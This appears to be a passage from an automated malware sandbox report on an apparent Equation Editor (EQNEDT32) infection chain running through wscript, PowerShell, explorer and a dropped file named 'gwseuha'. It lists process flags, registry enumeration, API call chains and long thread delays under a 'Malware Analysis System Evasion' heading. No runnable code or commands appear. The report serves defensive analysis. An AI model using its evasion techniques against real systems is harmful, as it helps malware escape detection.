            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\gwseuhaProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Windows\SysWOW64\explorer.exe Code function: GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep,22_2_00083862
            Source: C:\Windows\SysWOW64\explorer.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep graph_24-890
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7731C7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API/Special instruction interceptor: Address: 7731BFFA
            Source: C:\Users\user\AppData\Roaming\gwseuha Memory allocated: 390000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\gwseuha Memory allocated: 27C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\gwseuha Memory allocated: 550000 memory reserve | memory write watch
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000816C7 GetCurrentProcessId,GetCurrentThreadId,CreateToolhelp32Snapshot,Thread32First,OpenThread,SuspendThread,ResumeThread,CloseHandle,Thread32Next,CloseHandle,22_2_000816C7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 599797
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Roaming\gwseuha Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\wscript.exe Window found: window name: WSH-Timer
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 851
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2113
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1193
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3796
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1544
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 588
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 1091
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4830
            Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 1354
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4493
            Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 1122
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 4041
            Source: C:\Windows\SysWOW64\explorer.exe Window / User API: threadDelayed 1242
            Source: C:\Windows\explorer.exe Window / User API: threadDelayed 3984
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3332 Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3616 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3544 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664 Thread sleep count: 1193 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3664 Thread sleep count: 3796 > 30
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3700 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep time: -599797s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep time: -1200000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3644 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3836 Thread sleep count: 1544 > 30
            Source: C:\Windows\explorer.exe TID: 3836 Thread sleep time: -154400s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3828 Thread sleep count: 588 > 30
            Source: C:\Windows\explorer.exe TID: 3832 Thread sleep count: 1091 > 30
            Source: C:\Windows\explorer.exe TID: 3832 Thread sleep time: -109100s >= -30000s
            Source: C:\Windows\explorer.exe TID: 1340 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3836 Thread sleep count: 4830 > 30
            Source: C:\Windows\explorer.exe TID: 3836 Thread sleep time: -483000s >= -30000s
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3896 Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\System32\taskeng.exe TID: 4012 Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\AppData\Roaming\gwseuha TID: 4048 Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1536 Thread sleep count: 1354 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 1536 Thread sleep time: -1354000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2684 Thread sleep count: 4493 > 30
            Source: C:\Windows\explorer.exe TID: 2684 Thread sleep time: -4493000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2496 Thread sleep count: 1122 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2496 Thread sleep time: -1122000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2760 Thread sleep count: 4041 > 30
            Source: C:\Windows\explorer.exe TID: 2760 Thread sleep time: -4041000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2752 Thread sleep count: 1242 > 30
            Source: C:\Windows\SysWOW64\explorer.exe TID: 2752 Thread sleep time: -1242000s >= -30000s
            Source: C:\Windows\explorer.exe TID: 2700 Thread sleep count: 3984 > 30
            Source: C:\Windows\explorer.exe TID: 2700 Thread sleep time: -3984000s >= -30000s
            Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
            Source: C:\Windows\explorer.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,19_2_000C1D4A
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,19_2_000C3ED9
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 19_2_000C2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,19_2_000C2B15
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 21_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,21_2_0008255C
            Source: C:\Windows\SysWOW64\explorer.exe Code function: 22_2_000815BE RtlZeroMemory,SHGetSpecialFolderPathW,lstrcatW,PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,PathCombineW,PathMatchSpecW,PathCombineW,FindNextFileW,FindClose,22_2_000815BE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000814D8 wsprintfW,FindFirstFileW,wsprintfW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,22_2_000814D8
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_000813FE wsprintfW,FindFirstFileW,wsprintfW,RemoveDirectoryW,FindNextFileW,FindClose,22_2_000813FE
            Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_000C6512 GetSystemInfo,19_2_000C6512
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599797Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
